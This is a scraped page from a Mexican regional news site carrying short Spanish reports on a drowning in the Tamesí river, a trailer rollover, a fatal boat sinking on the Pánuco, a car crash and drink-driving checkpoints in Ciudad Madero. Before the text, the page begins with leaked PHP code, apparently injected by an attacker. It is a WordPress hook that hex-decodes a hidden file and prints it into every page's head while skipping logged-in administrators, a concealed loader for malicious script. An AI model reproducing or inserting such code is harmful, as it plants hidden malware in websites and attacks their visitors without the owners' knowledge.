if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Se ahoga albañil en el río Tamesí – Reporte Noreste
Connect with us

Altamira Tamps.- Infortunado albañil perdió la vida ahogado al caer en el Río Tamesí, después de que su lancha se volcara al impactar contra la bocatoma del mencionado río.

Los hechos ocurrieron alrededor de las 19:10 horas de este domingo, perdiendo la vida Apolinar Armenta de 65 años de edad y originario de Ozuluama, Veracruz, mismo que fue identificado por su compañero identificado como Salvador Ochoa Segura.

De acuerdo a lo informado por Ochoa Segura, ambos provenían de la ribera del Río Tamesí, en donde se encontraba –el fallecido- trabajando en una obra de albañilería; al llegar a la orilla la lancha en la que se transportaban golpeó la bocatoma de la Comapa, lo que ocasionó que volcara bruscamente, saliendo proyectada la persona que falleció y pegándose un fuerte golpe en la cabeza, teniendo una muerte instantánea.

Ochoa Segura señaló que él salió nadando inmediatamente pero no encontró a Polo, por lo que comenzó a buscarlo y desesperado dio aviso a las autoridades, arribando elementos de Bomberos y de Protección Civil quienes comenzaron a buscar el cuerpo, mismo que salió a flote una hora después, siendo llevado a la orilla y examinado por personal de SEMEFO.

Al parecer el ahora occiso se encontraba bajo los influjos del alcohol al momento del accidente, por lo que pudo haberse golpeado con la lancha y perdido el conocimiento dentro del agua, sin embargo será la autopsia de ley la que determine las verdaderas causas de su muerte.

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Sur de Tamaulipas

Vuelca tráiler en la carretera Rumbo Nuevo

Published

on

Ciudad Victoria, Tamaulipas.- Un tractocamión con plataforma, volcó en la carretera Rumbo Nuevo, dejando a su operador lesionado y atendido por elementos de emergencias del municipio de Jaumave, Tamaulipas.

El incidente fue reportado a la altura del kilómetro 33 de la citada carretera, cuando el operador se dirigía de Ciudad Victoria a Silao, Guanajuato, procedente del municipio de Altamira, en el sur de la entidad.

Al lugar acudieron los diferentes cuerpos de emergencias apoyados por la guardia Estatal División Caminos para resguardar el lugar mientras se realizan las maniobras para retirar la pesada unidad.

Atención para automovilistas y operadores viajeros que pasarán por esa zona, pues la circulación es lenta y sólo está habilitado un carril.

Continue Reading

Sur de Tamaulipas

Muere otro obrero del hundimiento de lancha en el Pánuco

Published

on

Tampico, Tamaulipas.- Uno de los dos obreros que se salvaron al momento del hundimiento de la lancha en la que paseaban por el Río Pánuco, falleció a consecuencia de complicaciones en el área de terapia intensiva del Hospital General Carlos Canseco.

La Fiscalía General de Justicia, confirmó la muerte de esta persona después de 22 días de estar bajo cuidados, sin que pudiera resistir a una complicación que se presentó mientras trataba de recuperarse.

LOS HECHOS OCURRIERON EL 3 DE NOVIEMBRE

Como se informó en su momento, este obrero es uno de los 8 trabajadores que el jueves 3 de noviembre contrataron a un lanchero para un paseo por el Río Pánuco, pues ese día se les notificó que se suspenderían los trabajos en el nuevo Hospital Civil de Ciudad Madero.

De acuerdo a la versión dada por el lanchero, un barco camaronero les hizo olas y por el peso que llevaba en la lancha, ésta se fue a pique y terminó por  hundirse.

Como pudo arrastró a uno de los pasajeros pero éste ya no contaba con signos vitales, mientras que tres más lograron salir, mismos que fueron llevados al Hospital Carlos Canseco, mientras que cinco restantes murieron ahogados.

Con el paso de los días se encontraron tres cuerpos, faltando otros dos por ser localizados y que hasta el momento son civiles los que realizan la búsqueda.

Continue Reading

Sur de Tamaulipas

Mujer prensada dentro de una camioneta en accidente vehicular

Published

on

Altamira, Tamaulipas.- Una mujer quedó prensada en el asiento de copiloto de una camioneta pick up, al sufrir un accidente vehicular cuando circulaba a exceso de velocidad por el bulevar Primex, con rumbo al centro de Altamira.

El accidente ocurrió poco antes de las 9 de la mañana de este día en el citado lugar a la altura de la entrada al viejo basurero municipal.

El accidente ocurrió al parecer cuando el conductor de la unidad circulaba por el carril derecho y al pasar sobre lodo, perdió el control de la camioneta y se fue directo al camellón, estrellándose de costado derecho contra un árbol.

Esto provocó que la mujer que le acompañaba quedara prensada en los fierros retorcidos, siendo necesario el equipo hidráulico para romper y extraer a la lesionada, siendo trasladada junto con el conductor a un hospital de la localidad.

Continue Reading

Sur de Tamaulipas

Operativo de alcohol permanente durante diciembre en Ciudad Madero

Published

on

Ciudad Madero Tamaulipas.- Una multa mínima de 7 mil 500 pesos, que puede aumentar, se aplicará a automovilistas que sean sorprendidos en los ahora llamados filtros de prevención de accidentes u operativos de alcoholemia, que se instalan de manera permanente en distintos puntos de Ciudad Madero.

Sandra Patricia Cruz Moreno, directora de transito de Madero, señaló que en un año que lleva al frente de la dirección de tránsito y por instrucciones del alcalde, Adrián Oseguera Kernion, los operativos anti alcohol o ahora llamados filtros de prevención de accidentes, han dado buenos resultados, bajando de manera importante los accidentes por conducir en estado de ebriedad. 

Sandra Cruz Moreno

Indicó Cruz Moreno, que durante el fin de semana y a causa de las lluvias y las bajas temperaturas, no se detuvo a persona alguna manejando en estado de ebriedad.

EXHORTO A DESIGNAR CONDUCTOR QUE NO TOME ALCOHOL

Sandra Patricia Cruz Moreno, titula de transito y vialidad, exhorta los conductores, que durante las fiestas de diciembre, con posadas y festejos de nochebuena, navidad y fin de año, sean prudentes y no conducir bajo los efectos del alcohol.

Se previene un accidente que puede ser mortal, causar daños a terceros o pagar una multa mínima de 7 mil 500 pesos que afectaría la economía familiar.

Los ahora llamados filtros de prevención de accidentes u operativos anti alcohol, serán permanentes en lo que resta el año y las fiestas decembrinas, sentenció Cruz Moreno.

Continue Reading

Copyright © 2021 Desarrollado por Design House Tampico